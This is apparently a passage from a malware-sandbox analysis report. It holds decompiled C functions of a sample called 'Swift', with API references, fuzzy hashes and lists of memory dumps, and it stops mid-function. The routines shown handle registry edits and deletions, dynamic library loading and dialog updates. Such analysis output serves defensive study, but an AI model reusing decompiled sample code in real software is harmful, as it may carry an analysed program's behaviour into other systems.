Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-224404859
Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction ID: 80dea6f45e067b588cff8bcf83547a83d2175154ff0abb359173e7e1f881b21a
Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
Instruction Fuzzy Hash: 70010871D04219EAEF119BA0D9447EFBBB8EF04354F00457AE905B6180D3B89604CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402A4C Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x7a2830 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A4C(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F11(4);
					if(_t27 == 0) {
						if( *0x7a2830 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x7a2830, 0);
				}
				return _t18;
			}

0x00402a6d
0x00402a75
0x00402a9d
0x00402a87
0x00402ad7
0x00402add
0x00000000
0x00402adf
0x00402a9b
0x00000000
0x00000000
0x00402a9b
0x00402ab2
0x00402aba
0x00402ac1
0x00402aed
0x00000000
0x00000000
0x00402af5
0x00402afd
0x00000000
0x00000000
0x00000000
0x00402afd
0x00000000
0x00402ad0
0x00402ae4

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
RegCloseKey.ADVAPI32(?), ref: 00402AB2
RegCloseKey.ADVAPI32(?), ref: 00402AD7
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: fc34d82fc5654a3bfccc470cd4f02dde57c5bc9481ceb963dedbed405cf2e8f4
Instruction ID: fc4b61ea5aa0bc44178762f219a31e42fd7883640d337a78b57668ad102cb360
Opcode Fuzzy Hash: fc34d82fc5654a3bfccc470cd4f02dde57c5bc9481ceb963dedbed405cf2e8f4
Instruction Fuzzy Hash: FD117F71600009FFDF21AF90DE48DAF3B69EB44384B004076FA05B10A0DBB89E51EF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x004028a4
0x004028b0

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 157963953b5984a268fc24913aa85a48627f2b00dd7a4957a1c877c2a76078fc
Instruction ID: ced4b62b35316a0997585a48c51ad9c35eb7189b285122a9798140dfe4e1b682
Opcode Fuzzy Hash: 157963953b5984a268fc24913aa85a48627f2b00dd7a4957a1c877c2a76078fc
Instruction Fuzzy Hash: 2DF0FF72904114AFDB00EBA4DD88DAFB7BCFB44305B044536F501F6191C7789D419B79

Uniqueness

Uniqueness Score: -1.00%

Function 00404636 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404636(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BA7(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BA7(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BA7(_t41, _t47, 0x79ed90, 0x79ed90, _a8);
				wsprintfA(_t32 + lstrlenA(0x79ed90), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x7a1f58, _a4, 0x79ed90);
			}

0x0040463c
0x00404641
0x00404649
0x0040464a
0x00404657
0x0040465f
0x00404660
0x00404662
0x00404664
0x00404666
0x00404669
0x00404669
0x00404670
0x00404676
0x00404676
0x0040467d
0x00404684
0x00404687
0x0040468a
0x0040468a
0x0040468e
0x0040469e
0x004046a0
0x004046a3
0x0040464c
0x0040464c
0x00404653
0x00404653
0x004046ab
0x004046b6
0x004046cc
0x004046dc
0x004046f8

APIs

lstrlenA.KERNEL32(0079ED90,0079ED90,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404551,000000DF,00000000,00000400,?), ref: 004046D4
wsprintfA.USER32 ref: 004046DC
SetDlgItemTextA.USER32 ref: 004046EF

Strings

%u.%u%s%s, xrefs: 004046BE

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c4392164b2971c3dc980ed3176e77cabdca36e596212d945af12dd1c7546b238
Instruction ID: ea00261c0ff08472e064f5e5dddb6472ee8a3b07f5ff399c7a491ad2b8daf12b
Opcode Fuzzy Hash: c4392164b2971c3dc980ed3176e77cabdca36e596212d945af12dd1c7546b238
Instruction Fuzzy Hash: 9511E473A041282BEB0065699C45EAF3298DB82334F250637FA25F61D1F97D9C1286A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E004029EF(3);
				 *(_t55 + 8) = E004029EF(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A0C(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A0C();
					_t28 = E00402A0C();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029EF();
					_t37 = E004029EF();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AE3();
				}
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402849
0x00402849
0x004028a4
0x004028b0

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 450a356e9c7417c321e9dc4bfa9d46628c5cfd7eb2c4d809e4ed627d2cde69af
Instruction ID: 7555d4ba81be5aedabcc4b3d16d3c9824c09f99eaa36067cf8b21de99279ea97
Opcode Fuzzy Hash: 450a356e9c7417c321e9dc4bfa9d46628c5cfd7eb2c4d809e4ed627d2cde69af
Instruction Fuzzy Hash: 64217471A44248BFEF01AFB4CD8AAAE7BB5EF44344F14417AF501B61D1D6788940DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405678 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405678(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x00405679
0x00405690
0x00405698
0x00405698
0x004056a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 0040567E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405687
lstrcatA.KERNEL32(?,00409010), ref: 00405698

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405678

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: b71f8c0d5f548bd25b03b29a766e3729f4c09b5a16acc9c169f2c4b8965de774
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 0ED0A962609A302ED202261A9C06ECB3A2CCF42302B044832F504B62D2C33C7C41CBFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x7a2838");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a2808 =  *0x7a2808 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E71(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x7a3000, 0x40b030, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403578(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f67
0x00401f67
0x00401f6c
0x00401f73
0x0040202f
0x0040217a
0x0040217a
0x004028a1
0x004028a4
0x004028b0
0x004028b0
0x00401f82
0x00401f8c
0x00401f8f
0x00401f9e
0x00401fa8
0x00401fac
0x00402028
0x00000000
0x00402028
0x00401fae
0x00401fb8
0x00401fbc
0x00402000
0x00401fbe
0x00401fc1
0x00401fc4
0x00401ff4
0x00401fc6
0x00401fc9
0x00401fd2
0x00401fd4
0x00401fd4
0x00401fd2
0x00401fc4
0x00402008
0x0040201d
0x0040201d
0x00000000
0x00402008
0x00401f98
0x00401f9c
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92

Part of subcall function 00404E71: lstrlenA.KERNEL32(0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000,?), ref: 00404EAA
Part of subcall function 00404E71: lstrlenA.KERNEL32(00402FAB,0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000), ref: 00404EBA
Part of subcall function 00404E71: lstrcatA.KERNEL32(0079E568,00402FAB,00402FAB,0079E568,00000000,0078F738,00789938), ref: 00404ECD
Part of subcall function 00404E71: SetWindowTextA.USER32(0079E568,0079E568), ref: 00404EDF
Part of subcall function 00404E71: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F05
Part of subcall function 00404E71: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F1F
Part of subcall function 00404E71: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F2D

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6626cf223723daa4b23c7f12caa64b3dbf86befe01a7d93a09f74728bf03ee98
Instruction ID: 49a53e76c20d4efd0f1dfb2069b7094c6994a99bf491f20630532a3e8d73498b
Opcode Fuzzy Hash: 6626cf223723daa4b23c7f12caa64b3dbf86befe01a7d93a09f74728bf03ee98
Instruction Fuzzy Hash: 3721DB32904215BBDF206F64CE8DA6E7971BF45358F20423BF501B62E1DBBC49419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x7a2830 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a430) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a430 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E71( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a430, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a430, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x7a2808 =  *0x7a2808 +  *(_t37 - 4);
				return 0;
			}

0x0040231a
0x0040231f
0x00402329
0x00402333
0x00402336
0x00402350
0x00402357
0x0040235f
0x0040236d
0x00402371
0x0040237c
0x0040237c
0x00402380
0x00402384
0x0040238a
0x0040238f
0x0040238f
0x00402393
0x0040239f
0x0040239f
0x004023b8
0x004023ba
0x004023ba
0x004023bd
0x00402493
0x00402493
0x004028a4
0x004028b0

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
lstrlenA.KERNEL32(0040A430,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
RegSetValueExA.ADVAPI32(?,?,?,?,0040A430,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
RegCloseKey.ADVAPI32(?,?,?,0040A430,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: cc552f6f622d76f8ee4a27a9f827e79fc4c93f1c7f60df3763420374e6b7a2c2
Instruction ID: b5fff50703805566a5ddec3306bab0af1ab196dcfa3441cfc33a8e047093d918
Opcode Fuzzy Hash: cc552f6f622d76f8ee4a27a9f827e79fc4c93f1c7f60df3763420374e6b7a2c2
Instruction Fuzzy Hash: 4E119071E00208BEEB10EFA4DE89EAF7A79EB40358F10403AF905B61D1C6B85D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 0040570C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040570C(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
